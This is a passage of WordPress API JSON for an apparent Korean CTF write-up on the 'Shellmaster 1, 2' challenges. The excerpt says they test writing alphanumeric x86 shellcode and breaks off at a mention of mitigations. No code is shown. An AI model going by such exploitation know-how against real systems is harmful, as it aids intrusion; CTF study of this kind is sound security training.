      Shellmaster 1, 2 \ub458 \ub2e4 \uae30\ubcf8\uc801\uc73c\ub85c alphanumeric shellcode(\uc774\uac8c \uc2e4\uc81c\ub85c \uc4f8\ubaa8\uac00 \uc788\ub098\ub294 \ubaa8\ub974\uaca0\uc9c0\ub9cc..)\ub97c \uc791\uc131\ud558\ub294 \ub2a5\ub825\uc774 \uc788\ub294\uc9c0\uc5d0 \ub300\ud574 \ubb3b\ub294 \ubb38\uc81c\uc600\ub2e4. \ubb38\uc81c\ub294 \ub458 \ub2e4 x86\ud658\uacbd\uc774\uc5c8\uace0 alphanumeric \ubc94\uc704\uc5d0\uc11c \uc758\uc678\ub85c \uc4f8\ub9cc\ud55c instruction\uc774 \ub9ce\uc544\uc11c \ud06c\uac8c \uc5b4\ub824\uc6b4 \uc810\uc740 \uc798 \uc5c6\ub2e4\uace0 \ub290\uaef4\uc9c8 \uc218\ub3c4 \uc788\ub2e4. \ub450 \ubb38\uc81c\ub294 \uac70\uc758 \ub611\uac19\uc740\ub370 \uc57d\uac04\uc758 \ucc28\uc774\uc810\uc774 \uc788\ub2e4. \uc774 \uc810\uc5d0 \ub300\ud574\uc11c\ub294 \ubb38\uc81c\uc5d0 \ub300\ud574 \uc11c\uc220\ud558\uba74\uc11c \ucd94\uac00\ub85c \uc801\ub3c4\ub85d \ud558\uaca0\ub2e4. Shellmaster1 Mitigation Relro…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,11],"tags":[],"class_list":["post-903","post","type-post","status-publish","format-standard","hentry","category-http-ipwn-kr-blog-pwnable","category-writep-up"],"_links":{"self":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/903"}],"collection":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/comments?post=903"}],"version-history":[{"count":12,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/903\/revisions"}],"predecessor-version":[{"id":913,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/903\/revisions\/913"}],"wp:attachment":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/media?parent=903"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/categories?post=903"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/tags?post=903"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}